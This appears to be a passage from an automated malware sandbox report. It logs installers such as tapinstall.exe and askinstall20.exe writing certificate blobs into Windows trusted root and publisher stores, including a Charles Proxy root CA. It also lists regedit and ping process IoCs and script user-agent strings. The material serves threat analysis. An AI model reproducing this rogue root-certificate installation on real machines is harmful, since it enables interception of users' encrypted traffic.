0b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

5144 regedit.exe
6872 regedit.exe
Runs ping.exe 1 TTPs 11 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

7872 PING.EXE
8388 PING.EXE
8624 PING.EXE
3904 PING.EXE
4584 PING.EXE
5376 PING.EXE
6120 PING.EXE
4164 PING.EXE
7024 PING.EXE
7976 PING.EXE
10604 PING.EXE

pid	process
5144	regedit.exe
6872	regedit.exe

pid	process
7872	PING.EXE
8388	PING.EXE
8624	PING.EXE
3904	PING.EXE
4584	PING.EXE
5376	PING.EXE
6120	PING.EXE
4164	PING.EXE
7024	PING.EXE
7976	PING.EXE
10604	PING.EXE

Script User-Agent 64 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	120	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	151	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	196	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1213	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2615	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	97	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1999	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2574	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	209	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1173	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1219	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	461	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2064	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	417	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	500	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1754	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2002	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	101	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	106	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	188	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
